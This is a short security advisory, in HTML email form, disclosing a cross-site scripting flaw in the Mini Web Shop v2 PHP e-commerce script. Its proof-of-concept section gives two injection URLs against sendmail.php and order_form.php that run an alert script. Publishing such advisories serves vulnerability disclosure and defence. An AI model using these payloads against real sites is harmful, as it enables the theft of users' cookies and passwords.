<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7652.5">
<TITLE>Mini Web Shop v.2 vulnerable to XSS</TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>-=[--------------------ADVISORY-------------------]=-<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Mini Web Shop V.2<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>
&nbsp; Author: CorryL&nbsp;&nbsp;&nbsp; [corryl80@gmail.com]&nbsp;&nbsp;<BR>
-=[-----------------------------------------------]=-<BR>
<BR>
<BR>
-=[+] Application:&nbsp;&nbsp;&nbsp; Mini Web Shop<BR>
-=[+] Version:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 2<BR>
-=[+] Vendor's URL:&nbsp;&nbsp; <A HREF="http://obiewebsite.sourceforge.net/o.php?Mini_Web_Shop">http://obiewebsite.sourceforge.net/o.php?Mini_Web_Shop</A><BR>
-=[+] Platform:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Windows\Linux\Unix<BR>
-=[+] Bug type:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Cross-Site Script<BR>
-=[+] Exploitation:&nbsp;&nbsp; Remote<BR>
-=[-]<BR>
-=[+] Author:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; CorryL&nbsp; ~ corryl80[at]gmail[dot]com ~<BR>
-=[+] Reference:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <A HREF="http://corryl.altervista.org">http://corryl.altervista.org</A><BR>
-=[+] Irc Chan:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; irc.darksin.net #x0n3-h4ck&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>
<BR>
<BR>
..::[ Descriprion ]::..<BR>
<BR>
An e-commerce PHP script has an online web shop,<BR>
shopping cart (based on cookies),<BR>
one-level categories, multi languages supports, voting and searching...<BR>
&nbsp;Fully functions admin control panel. Each item has thumbnail photo, voting,<BR>
click and qualtity tracker, active or inactive mode, ....<BR>
Users can shopping on Web then order via email then purchasing in cash/cheque or Credit Card.<BR>
Fully admin control panel with items management, new item adding, news publishing, file editor,<BR>
and online configuation tool, you dont have to change your config via FTP.<BR>
<BR>
<BR>
..::[ Bug ]::..<BR>
<BR>
This software is affection from a bug type cross site script ,<BR>
a remote attaker is able to exploit this bug to draw information password,<BR>
cookie, etc.<BR>
<BR>
..::[ Proof Of Concept ]::..<BR>
<BR>
<A HREF="http://remote-server/path/modules/sendmail.php/">http://remote-server/path/modules/sendmail.php/</A>&gt;&quot;&gt;&lt;ScRiPt&gt;alert(100438267)&lt;/ScRiPt&gt;<BR>
<A HREF="http://remote-server/path/modules/order_form.php/">http://remote-server/path/modules/order_form.php/</A>&gt;&quot;&gt;&lt;ScRiPt&gt;alert(1979336232)&lt;/ScRiPt&gt;<BR>
<BR>
<BR>
</FONT>
</P>

</BODY>
</HTML>